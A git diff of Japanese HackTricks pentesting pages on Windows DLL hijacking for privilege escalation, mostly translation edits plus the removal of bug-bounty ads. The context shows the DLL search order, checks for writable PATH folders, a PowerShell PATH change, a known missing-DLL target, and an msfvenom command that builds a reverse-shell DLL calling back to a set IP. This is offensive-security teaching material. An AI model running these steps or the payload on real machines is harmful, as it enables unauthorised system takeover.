+パッケージ要素には、インストーラーのバージョンを指定する InstallerVersion や、パッケージが圧縮されているかどうかを示す Compressed などの属性が含まれていることに注意することが重要です。
 
-作成プロセスでは、wixtoolsのツールであるcandle.exeを利用して、msi.xmlからwixobjectを生成します。次のコマンドを実行する必要があります:
+作成プロセスでは、wixtools のツールである candle.exe を利用して msi.xml から wixobject を生成します。次のコマンドを実行する必要があります:
 ```
 candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index 43afa6cfc..ef8c8e5bd 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -14,14 +14,14 @@ DLLハイジャックにはいくつかの方法があり、各アプリケー
 
 1. **DLL置換**: 本物のDLLを悪意のあるDLLと入れ替え、オプションでDLLプロキシを使用して元のDLLの機能を保持します。
 2. **DLL検索順序ハイジャック**: 悪意のあるDLLを正当なDLLの前に検索パスに配置し、アプリケーションの検索パターンを悪用します。
-3. **ファントムDLLハイジャック**: アプリケーションが読み込むための悪意のあるDLLを作成し、存在しない必要なDLLだと考えさせます。
+3. **ファントムDLLハイジャック**: アプリケーションが読み込むための悪意のあるDLLを作成し、存在しない必要なDLLだと思わせます。
 4. **DLLリダイレクション**: `%PATH%`や`.exe.manifest` / `.exe.local`ファイルの検索パラメータを変更して、アプリケーションを悪意のあるDLLに誘導します。
-5. **WinSxS DLL置換**: WinSxSディレクトリ内で正当なDLLを悪意のあるDLLに置き換える方法で、DLLサイドローディングに関連付けられることが多いです。
+5. **WinSxS DLL置換**: WinSxSディレクトリ内で正当なDLLを悪意のあるDLLと置き換える方法で、DLLサイドローディングに関連付けられることが多いです。
 6. **相対パスDLLハイジャック**: コピーしたアプリケーションと共にユーザーが制御するディレクトリに悪意のあるDLLを配置し、バイナリプロキシ実行技術に似ています。
 
 ## 不足しているDllの発見
 
-システム内の不足しているDLLを見つける最も一般的な方法は、sysinternalsから[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)を実行し、**次の2つのフィルターを設定**します：
+システム内の不足しているDLLを見つける最も一般的な方法は、sysinternalsから[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)を実行し、**次の2つのフィルターを設定**することです：
 
 ![](<../../images/image (311).png>)
 
@@ -32,17 +32,17 @@ DLLハイジャックにはいくつかの方法があり、各アプリケー
 ![](<../../images/image (314).png>)
 
 **一般的に不足しているdllを探している場合**は、これを**数秒間**実行します。\
-**特定の実行可能ファイル内の不足しているdllを探している場合**は、**別のフィルター「プロセス名」「含む」「\<exec name>」を設定し、実行してイベントのキャプチャを停止**する必要があります。
+**特定の実行可能ファイル内の不足しているdllを探している場合**は、**「プロセス名」が「含む」"\<exec name>"のような別のフィルターを設定し、それを実行してイベントのキャプチャを停止するべきです**。
 
 ## 不足しているDllの悪用
 
-特権を昇格させるための最良のチャンスは、**特権プロセスが読み込もうとするdllを書くことができる**ことです。したがって、**元のdll**があるフォルダーの前に**dllが検索されるフォルダー**に**dllを書くことができる**か、**dllが検索されるフォルダー**に**書き込むことができる**必要がありますが、元の**dllはどのフォルダーにも存在しない**必要があります。
+特権を昇格させるために、最も良いチャンスは、**特権プロセスが読み込もうとするdllを書くことができる**ことです。したがって、**元のdll**があるフォルダーの前に**dllが検索されるフォルダー**に**dllを書くことができる**か、**dllが検索されるフォルダーのいずれかに書き込むことができる**必要があります（奇妙なケース）。または、元の**dllがどのフォルダーにも存在しないフォルダーに書き込むことができる**必要があります。
 
 ### Dll検索順序
 
-**具体的にDLLがどのように読み込まれるかは、[Microsoftのドキュメント](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)で確認できます。**
+**DLLがどのように特に読み込まれるかは、[**Microsoftのドキュメント**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)で確認できます。**
 
-**Windowsアプリケーション**は、特定の順序に従って**事前定義された検索パス**に従ってDLLを探します。DLLハイジャックの問題は、有害なDLLがこれらのディレクトリの1つに戦略的に配置され、正当なDLLの前に読み込まれることを保証する場合に発生します。この問題を防ぐための解決策は、アプリケーションが必要なDLLを参照する際に絶対パスを使用することを確認することです。
+**Windowsアプリケーション**は、特定の順序に従って**事前定義された検索パス**に従ってDLLを探します。DLLハイジャックの問題は、有害なDLLがこれらのディレクトリの1つに戦略的に配置され、正当なDLLの前に読み込まれることを保証する場合に発生します。これを防ぐための解決策は、アプリケーションが必要なDLLを参照する際に絶対パスを使用することを確認することです。
 
 32ビットシステムの**DLL検索順序**は以下の通りです：
 
@@ -53,7 +53,7 @@ DLLハイジャックにはいくつかの方法があり、各アプリケー
 5. 現在のディレクトリ。
 6. PATH環境変数にリストされているディレクトリ。これは、**App Paths**レジストリキーによって指定されたアプリケーションごとのパスを含まないことに注意してください。DLL検索パスを計算する際に**App Paths**キーは使用されません。
 
-これは、**SafeDllSearchMode**が有効な場合の**デフォルト**の検索順序です。無効にすると、現在のディレクトリが2番目の位置に昇格します。この機能を無効にするには、**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**レジストリ値を作成し、0に設定します（デフォルトは有効です）。
+これは、**SafeDllSearchMode**が有効な場合の**デフォルト**の検索順序です。これが無効になると、現在のディレクトリが2番目の位置に上昇します。この機能を無効にするには、**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**レジストリ値を作成し、0に設定します（デフォルトは有効です）。
 
 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa)関数が**LOAD_WITH_ALTERED_SEARCH_PATH**で呼び出されると、検索は**LoadLibraryEx**が読み込んでいる実行可能モジュールのディレクトリから始まります。
 
@@ -65,9 +65,9 @@ DLLハイジャックにはいくつかの方法があり、各アプリケー
 
 標準のDLL検索順序に対する特定の例外は、Windowsのドキュメントに記載されています：
 
-- **メモリに既に読み込まれているDLLと同じ名前のDLL**が遭遇した場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。
-- DLLが現在のWindowsバージョンの**既知のDLL**として認識される場合、システムはその既知のDLLのバージョンとその依存DLLを使用し、**検索プロセスを省略します**。レジストリキー**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**には、これらの既知のDLLのリストが保持されています。
-- **DLLに依存関係がある場合**、これらの依存DLLの検索は、最初のDLLがフルパスで特定されたかどうかに関係なく、**モジュール名**のみで示されたかのように行われます。
+- **メモリに既に読み込まれているDLLと同じ名前のDLL**が見つかった場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。
+- DLLが現在のWindowsバージョンの**既知のDLL**として認識される場合、システムはその既知のDLLのバージョンと、その依存DLLを使用し、**検索プロセスを省略します**。レジストリキー**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**には、これらの既知のDLLのリストが保持されています。
+- **DLLに依存関係がある場合**、これらの依存DLLの検索は、最初のDLLがフルパスで識別されたかどうかに関係なく、**モジュール名**のみで示されたかのように行われます。
 
 ### 特権の昇格
 
@@ -76,8 +76,8 @@ DLLハイジャックにはいくつかの方法があり、各アプリケー
 - **異なる特権**（水平または側方移動）で動作するか、動作するプロセスを特定し、**DLLが不足している**ことを確認します。
 - **DLLが検索される**任意の**ディレクトリ**に**書き込みアクセス**があることを確認します。この場所は、実行可能ファイルのディレクトリまたはシステムパス内のディレクトリである可能性があります。
 
-はい、要件を見つけるのは複雑です。**デフォルトでは、特権のある実行可能ファイルがdllを欠いているのを見つけるのは奇妙です**し、**システムパスフォルダーに書き込み権限を持つのはさらに奇妙です**（デフォルトではできません）。しかし、設定が誤っている環境ではこれは可能です。\
-要件を満たす幸運な場合は、[UACME](https://github.com/hfiref0x/UACME)プロジェクトを確認できます。**プロジェクトの主な目的はUACをバイパスすることですが、使用できるWindowsバージョンのDllハイジャックの**PoC**が見つかるかもしれません（おそらく書き込み権限のあるフォルダーのパスを変更するだけです）。
+はい、要件を見つけるのは複雑です。**デフォルトでは、特権のある実行可能ファイルがDLLを欠いているのを見つけるのは奇妙です**し、**システムパスフォルダーに書き込み権限を持つのはさらに奇妙です**（デフォルトではできません）。しかし、設定が誤っている環境ではこれは可能です。\
+運が良ければ要件を満たしている場合、[UACME](https://github.com/hfiref0x/UACME)プロジェクトを確認できます。**プロジェクトの主な目的はUACをバイパスすることですが、**使用できるWindowsバージョンのDLLハイジャックの**PoC**が見つかるかもしれません（おそらく書き込み権限のあるフォルダーのパスを変更するだけで済みます）。
 
 フォルダー内の**権限を確認する**には、次のようにします：
 ```bash
@@ -107,19 +107,19 @@ dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
 ### 例
 
 悪用可能なシナリオを見つけた場合、成功裏に悪用するための最も重要なことの1つは、**実行可能ファイルがインポートするすべての関数を少なくともエクスポートするdllを作成すること**です。とにかく、Dll Hijackingは、[**中程度の整合性レベルから高い整合性レベルに昇格するために便利です（UACをバイパス）**](../authentication-credentials-uac-and-efs.md#uac)または[**高い整合性からSYSTEMに昇格するために**](./#from-high-integrity-to-system)**役立ちます。** 有効なdllを作成する方法の例は、この実行のためのdll hijackingに焦点を当てたdll hijacking研究の中にあります：[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
-さらに、**次のセクション**では、**テンプレート**として役立つ可能性のある**基本的なdllコード**や、**必要のない関数をエクスポートしたdllを作成するためのコードを見つけることができます。
+さらに、**次のセクション**では、**テンプレート**として役立つ可能性のある**基本的なdllコード**や、**エクスポートされていない関数を持つdllを作成するためのコードを見つけることができます。
 
 ## **Dllの作成とコンパイル**
 
 ### **Dllプロキシ化**
 
-基本的に、**Dllプロキシ**は、**読み込まれたときに悪意のあるコードを実行することができるDll**ですが、**実際のライブラリへのすべての呼び出しを中継することによって**、**期待通りに機能する**こともできます。
+基本的に、**Dllプロキシ**は、**読み込まれたときに悪意のあるコードを実行することができるDll**ですが、**実際のライブラリへのすべての呼び出しを中継することによって**、**期待通りに**機能することもできます。
 
-[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)や[**Spartacus**](https://github.com/Accenture/Spartacus)を使用すると、実行可能ファイルを指定し、プロキシ化したいライブラリを選択して、**プロキシ化されたdllを生成する**ことができます。または、**Dllを指定して**、**プロキシ化されたdllを生成する**こともできます。
+[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)や[**Spartacus**](https://github.com/Accenture/Spartacus)を使用すると、実行可能ファイルを指定し、プロキシ化したいライブラリを選択して、**プロキシ化されたdllを生成**したり、**Dllを指定してプロキシ化されたdllを生成**したりできます。
 
 ### **Meterpreter**
 
-**revシェルを取得する（x64）：**
+**revシェルを取得（x64）：**
 ```bash
 msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index f05304aa0..891690059 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -2,49 +2,43 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-<figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
-
-**バグバウンティのヒント**: **ハッカーによって、ハッカーのために作られたプレミアム** **バグバウンティプラットフォーム** **Intigriti**に**サインアップ**しましょう！今日、[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加し、最大**$100,000**の報酬を得始めましょう！
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
 ## 基本情報
 
-DLLハイジャックは、信頼されたアプリケーションを操作して悪意のあるDLLを読み込ませることを含みます。この用語は、**DLLスプーフィング、インジェクション、サイドローディング**などのいくつかの戦術を含みます。主にコード実行、持続性の達成、そしてあまり一般的ではないが特権昇格に利用されます。ここでの昇格に焦点を当てていますが、ハイジャックの方法は目的に関係なく一貫しています。
+DLLハイジャックは、信頼されたアプリケーションを操作して悪意のあるDLLを読み込ませることを含みます。この用語は、**DLLスプーフィング、インジェクション、サイドローディング**などのいくつかの戦術を含みます。主にコード実行、持続性の達成、そしてあまり一般的ではない特権昇格に利用されます。ここでの昇格に焦点を当てていますが、ハイジャックの手法は目的に関係なく一貫しています。
 
 ### 一般的な技術
 
-DLLハイジャックにはいくつかの方法が使用されており、各アプリケーションのDLL読み込み戦略に応じて効果が異なります：
+DLLハイジャックにはいくつかの方法があり、各アプリケーションのDLL読み込み戦略に応じて効果が異なります：
 
 1. **DLL置換**: 正規のDLLを悪意のあるDLLと入れ替え、オプションでDLLプロキシを使用して元のDLLの機能を保持します。
 2. **DLL検索順序ハイジャック**: 悪意のあるDLLを正当なDLLの前に検索パスに配置し、アプリケーションの検索パターンを悪用します。
-3. **ファントムDLLハイジャック**: アプリケーションが存在しない必要なDLLだと思い込んで読み込む悪意のあるDLLを作成します。
+3. **ファントムDLLハイジャック**: アプリケーションが読み込むための悪意のあるDLLを作成し、存在しない必要なDLLだと考えさせます。
 4. **DLLリダイレクション**: `%PATH%`や`.exe.manifest` / `.exe.local`ファイルの検索パラメータを変更して、アプリケーションを悪意のあるDLLに誘導します。
-5. **WinSxS DLL置換**: WinSxSディレクトリ内で正当なDLLを悪意のあるDLLに置き換える方法で、DLLサイドローディングに関連しています。
+5. **WinSxS DLL置換**: WinSxSディレクトリ内で正当なDLLを悪意のあるDLLに置き換える方法で、DLLサイドローディングに関連付けられることが多いです。
 6. **相対パスDLLハイジャック**: コピーしたアプリケーションと共にユーザーが制御するディレクトリに悪意のあるDLLを配置し、バイナリプロキシ実行技術に似ています。
 
-## 不足しているDllの発見
+## 不足しているDLLの発見
 
-システム内の不足しているDllを見つける最も一般的な方法は、sysinternalsから[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)を実行し、**次の2つのフィルターを設定**します：
+システム内の不足しているDLLを見つける最も一般的な方法は、sysinternalsから[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)を実行し、**次の2つのフィルターを設定**することです：
 
 ![](<../../../images/image (961).png>)
 
 ![](<../../../images/image (230).png>)
 
-そして**ファイルシステムアクティビティ**のみを表示します：
+そして、**ファイルシステムアクティビティ**のみを表示します：
 
 ![](<../../../images/image (153).png>)
 
 **一般的に不足しているdllを探している場合**は、これを**数秒間**実行します。\
-**特定の実行可能ファイル内の不足しているdllを探している場合**は、**"プロセス名" "含む" "\<exec name>"**のような**別のフィルターを設定し、実行してイベントのキャプチャを停止**する必要があります。
+**特定の実行可能ファイル内の不足しているdllを探している場合**は、**「プロセス名」が「含む」"\<exec name>"のような別のフィルターを設定し、それを実行してイベントのキャプチャを停止するべきです**。
 
-## 不足しているDllの悪用
+## 不足しているDLLの悪用
 
-特権を昇格させるために、最も良いチャンスは、**特権プロセスが読み込もうとするdllを書くことができる**ことです。したがって、**元のdll**があるフォルダーの前に**dllが検索されるフォルダー**に**dllを書くことができる**か、**dllが検索されるフォルダー**に**書き込むことができる**必要がありますが、元の**dllはどのフォルダーにも存在しない**必要があります。
+特権を昇格させるための最良のチャンスは、**特権プロセスが読み込もうとするDLLを書くことができる**ことです。したがって、**元のDLL**があるフォルダーの前に**DLLが検索されるフォルダー**にDLLを書き込むことができるか、**DLLが検索されるフォルダー**に書き込むことができ、元の**DLLがどのフォルダーにも存在しない**場合です。
 
-### Dll検索順序
+### DLL検索順序
 
-**DLLがどのように特に読み込まれるかは、** [**Microsoftのドキュメント**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **で確認できます。**
+**DLLがどのように特に読み込まれるかは、[Microsoftのドキュメント](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)で確認できます。**
 
 **Windowsアプリケーション**は、特定の順序に従って**事前定義された検索パス**に従ってDLLを探します。DLLハイジャックの問題は、有害なDLLがこれらのディレクトリの1つに戦略的に配置され、正当なDLLの前に読み込まれることを保証する場合に発生します。この問題を防ぐための解決策は、アプリケーションが必要なDLLを参照する際に絶対パスを使用することを確認することです。
 
@@ -55,21 +49,21 @@ DLLハイジャックにはいくつかの方法が使用されており、各
 3. 16ビットシステムディレクトリ。このディレクトリのパスを取得する関数はありませんが、検索されます。 (_C:\Windows\System_)
 4. Windowsディレクトリ。 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya)関数を使用してこのディレクトリのパスを取得します。(_C:\Windows_)
 5. 現在のディレクトリ。
-6. PATH環境変数にリストされているディレクトリ。これは、**App Paths**レジストリキーによって指定されたアプリケーションごとのパスを含まないことに注意してください。 **App Paths**キーは、DLL検索パスを計算する際には使用されません。
+6. PATH環境変数にリストされているディレクトリ。これは、**App Paths**レジストリキーによって指定されたアプリケーションごとのパスを含まないことに注意してください。DLL検索パスを計算する際に**App Paths**キーは使用されません。
 
-これは、**SafeDllSearchMode**が有効な場合の**デフォルト**の検索順序です。無効にすると、現在のディレクトリが2番目の位置に昇格します。この機能を無効にするには、**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**レジストリ値を作成し、0に設定します（デフォルトは有効です）。
+これは、**SafeDllSearchMode**が有効な場合の**デフォルト**の検索順序です。これが無効になると、現在のディレクトリが2番目の位置に上昇します。この機能を無効にするには、**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**レジストリ値を作成し、0に設定します（デフォルトは有効です）。
 
 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa)関数が**LOAD_WITH_ALTERED_SEARCH_PATH**で呼び出されると、検索は**LoadLibraryEx**が読み込んでいる実行可能モジュールのディレクトリから始まります。
 
-最後に、**dllは名前だけでなく絶対パスを指定して読み込まれる可能性がある**ことに注意してください。その場合、そのdllは**そのパス内でのみ検索されます**（dllに依存関係がある場合、それらは名前で読み込まれたものとして検索されます）。
+最後に、**DLLは名前だけでなく絶対パスを指定して読み込まれる可能性がある**ことに注意してください。この場合、そのDLLは**そのパス内でのみ検索されます**（DLLに依存関係がある場合、それらは名前で読み込まれたものとして検索されます）。
 
 検索順序を変更する他の方法もありますが、ここでは説明しません。
 
-#### Windowsドキュメントからのdll検索順序の例外
+#### WindowsドキュメントからのDLL検索順序の例外
 
 標準のDLL検索順序に対する特定の例外は、Windowsのドキュメントに記載されています：
 
-- **メモリに既に読み込まれているDLLと同じ名前のDLL**が遭遇した場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。
+- **メモリに既に読み込まれているDLLと名前が同じDLL**に遭遇した場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。
 - DLLが現在のWindowsバージョンの**既知のDLL**として認識される場合、システムはその既知のDLLのバージョンとその依存DLLを使用し、**検索プロセスを省略します**。レジストリキー**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**には、これらの既知のDLLのリストが保持されています。
 - **DLLに依存関係がある場合**、これらの依存DLLの検索は、最初のDLLが完全なパスで識別されたかどうかに関係なく、**モジュール名**のみで示されたかのように行われます。
 
@@ -77,27 +71,27 @@ DLLハイジャックにはいくつかの方法が使用されており、各
 
 **要件**：
 
-- **異なる特権**（水平または側面移動）で動作するか、動作するプロセスを特定し、**DLLが不足している**ことを確認します。
+- **異なる特権**（水平または側方移動）で動作するか、動作するプロセスを特定し、**DLLが不足している**ことを確認します。
 - **DLLが検索される**任意の**ディレクトリ**に**書き込みアクセス**があることを確認します。この場所は、実行可能ファイルのディレクトリまたはシステムパス内のディレクトリである可能性があります。
 
-はい、要件は**デフォルトでは特権のある実行可能ファイルがdllを欠いているのを見つけるのは奇妙であり**、**システムパスフォルダーに書き込み権限を持つのはさらに奇妙です**（デフォルトではできません）。しかし、誤って構成された環境ではこれは可能です。\
-要件を満たす幸運な場合は、[UACME](https://github.com/hfiref0x/UACME)プロジェクトを確認できます。**プロジェクトの主な目的はUACをバイパスすることですが、**使用できるWindowsバージョンのDLLハイジャックの**PoC**が見つかるかもしれません（おそらく書き込み権限のあるフォルダーのパスを変更するだけで済みます）。
+はい、要件を見つけるのは複雑です。**デフォルトでは、特権のある実行可能ファイルがDLLを欠いているのを見つけるのは奇妙です**し、**システムパスフォルダーに書き込み権限を持つのはさらに奇妙です**（デフォルトではできません）。しかし、誤って設定された環境ではこれは可能です。\
+要件を満たす幸運な場合は、[UACME](https://github.com/hfiref0x/UACME)プロジェクトを確認できます。プロジェクトの**主な目的はUACをバイパスすることですが**、使用できるWindowsバージョンのDLLハイジャックの**PoC**が見つかるかもしれません（おそらく書き込み権限のあるフォルダーのパスを変更するだけです）。
 
 フォルダー内の**権限を確認する**には、次のようにします：
 ```bash
 accesschk.exe -dqv "C:\Python27"
 icacls "C:\Python27"
 ```
-すべてのフォルダーの**パーミッションを確認する**:
+すべてのフォルダーの**PATH内の権限を確認します**:
 ```bash
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 ```
-実行可能ファイルのインポートとDLLのエクスポートを確認するには、次のコマンドを使用できます:
+実行可能ファイルのインポートとDLLのエクスポートを確認することもできます:
 ```c
 dumpbin /imports C:\path\Tools\putty\Putty.exe
 dumpbin /export /path/file.dll
 ```
-完全なガイドについては、**Dll Hijackingを悪用して特権を昇格させる**方法を確認してください。**System Pathフォルダー**に書き込み権限がある場合：
+完全なガイドについては、**Dll Hijackingを悪用して特権を昇格させる**方法を、**System Pathフォルダー**に書き込み権限がある場合は、以下を確認してください：
 
 {{#ref}}
 writable-sys-path-+dll-hijacking-privesc.md
@@ -110,8 +104,8 @@ writable-sys-path-+dll-hijacking-privesc.md
 
 ### 例
 
-悪用可能なシナリオを見つけた場合、成功裏に悪用するための最も重要なことの1つは、**実行可能ファイルがインポートするすべての関数をエクスポートするdllを作成すること**です。とにかく、Dll Hijackingは、[**Medium IntegrityレベルからHighに昇格するために便利です（UACをバイパス）**](../../authentication-credentials-uac-and-efs/#uac)または[**High IntegrityからSYSTEMに昇格するために**](../#from-high-integrity-to-system)**便利です。** 有効なdllを作成する方法の例は、この実行のためのdll hijackingに焦点を当てたdll hijacking研究の中にあります：[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
-さらに、**次のセクション**では、**テンプレート**として役立つ可能性のある**基本的なdllコード**や、**必要のない関数をエクスポートしたdllを作成するためのコードを見つけることができます。
+悪用可能なシナリオを見つけた場合、成功裏に悪用するための最も重要なことの1つは、**実行可能ファイルがインポートするすべての関数を少なくともエクスポートするdllを作成すること**です。とにかく、Dll Hijackingは、[**中程度の整合性レベルから高整合性レベルに昇格するために便利です（UACをバイパス）**](../../authentication-credentials-uac-and-efs/#uac)または[**高整合性からSYSTEMに昇格するために**](../#from-high-integrity-to-system)**役立ちます。** 有効なdllを作成する方法の例は、この実行のためのdll hijackingに焦点を当てたdll hijacking研究の中にあります：[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
+さらに、**次のセクション**では、**テンプレート**として役立つか、**エクスポートされる必要のない関数を持つdllを作成するための**基本的なdllコードをいくつか見つけることができます。
 
 ## **Dllの作成とコンパイル**
 
@@ -223,10 +217,5 @@ return TRUE;
 - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
 - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
 
-<figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
-
-**バグバウンティのヒント**: **Intigriti**に**サインアップ**してください。これは**ハッカーによって、ハッカーのために作られたプレミアムバグバウンティプラットフォーム**です！今日、[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)で私たちに参加し、最大**$100,000**のバウンティを獲得し始めましょう！
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 277819671..7ae2a7ca2 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -20,9 +20,9 @@
 
 最初に必要なのは、**あなたよりも多くの特権**を持つプロセスを**特定する**ことで、そのプロセスがあなたが書き込むことができるシステムパスから**Dllを読み込もうとしている**必要があります。
 
-この場合の問題は、おそらくそれらのプロセスがすでに実行中であることです。どのDllがサービスに欠けているかを見つけるために、プロセスが読み込まれる前にできるだけ早くprocmonを起動する必要があります。したがって、欠落している.dllを見つけるために、次のことを行います：
+この場合の問題は、おそらくそれらのプロセスがすでに実行中であることです。どのDllがサービスに欠けているかを見つけるためには、プロセスが読み込まれる前にできるだけ早くprocmonを起動する必要があります。したがって、欠落している.dllを見つけるために、次のことを行います：
 
-- **フォルダー** `C:\privesc_hijacking` を作成し、**システムパス環境変数**にパス `C:\privesc_hijacking` を追加します。これを**手動**または**PS**で行うことができます：
+- **フォルダー** `C:\privesc_hijacking` を作成し、**システムパス環境変数**にパス `C:\privesc_hijacking` を追加します。これは**手動**または**PS**で行うことができます：
 ```powershell
 # Set the folder path to create and check events for
 $folderPath = "C:\privesc_hijacking"
@@ -41,42 +41,42 @@ $newPath = "$envPath;$folderPath"
 ```
 - **`procmon`** を起動し、**`Options`** --> **`Enable boot logging`** に移動し、プロンプトで **`OK`** を押します。
 - その後、**再起動**します。コンピュータが再起動すると、**`procmon`** はすぐにイベントの **記録**を開始します。
-- **Windows** が **起動したら `procmon`** を再度実行します。実行中であることが表示され、イベントをファイルに保存するかどうか尋ねられます。**はい**と答え、**イベントをファイルに保存**します。
-- **ファイル**が **生成されたら**、開いている **`procmon`** ウィンドウを **閉じ**、**イベントファイル**を **開き**ます。
-- これらの **フィルター**を追加すると、書き込み可能なシステムパスフォルダーからいくつかの **プロセスが読み込もうとした**すべてのDllが見つかります：
+- **Windows** が **起動したら `procmon`** を再度実行します。実行中であることが表示され、イベントをファイルに **保存** するかどうか尋ねられます。**はい** と答え、イベントをファイルに **保存** します。
+- **ファイル** が **生成されたら**、開いている **`procmon`** ウィンドウを **閉じ**、**イベントファイル** を **開き**ます。
+- これらの **フィルター** を追加すると、書き込み可能なシステムパスフォルダーから **プロセスが読み込もうとした** すべてのDllが見つかります：
 
 <figure><img src="../../../images/image (945).png" alt=""><figcaption></figcaption></figure>
 
-### 見逃したDlls
+### 見逃したDll
 
-無料の **仮想（vmware）Windows 11マシン**でこれを実行したところ、次の結果が得られました：
+無料の **仮想（vmware）Windows 11マシン** でこれを実行したところ、以下の結果が得られました：
 
 <figure><img src="../../../images/image (607).png" alt=""><figcaption></figcaption></figure>
 
-この場合、.exeは無駄なので無視してください。見逃したDLLは次のものでした：
+この場合、.exe は無駄なので無視してください。見逃したDLLは以下のものでした：
 
-| サービス                           | Dll                | CMDライン                                                             |
-| ---------------------------------- | ------------------ | -------------------------------------------------------------------- |
-| タスクスケジューラ (Schedule)     | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`          |
-| 診断ポリシーサービス (DPS)        | Unknown.DLL        | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
-| ???                                | SharedRes.dll      | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup`                |
+| サービス                         | Dll                | CMDライン                                                             |
+| ------------------------------- | ------------------ | -------------------------------------------------------------------- |
+| タスクスケジューラ (Schedule)       | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`          |
+| 診断ポリシーサービス (DPS) | Unknown.DLL        | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
+| ???                             | SharedRes.dll      | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup`                |
 
-これを見つけた後、[**WptsExtensions.dllを悪用する方法**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll)を説明している興味深いブログ記事を見つけました。これが今から **行うこと**です。
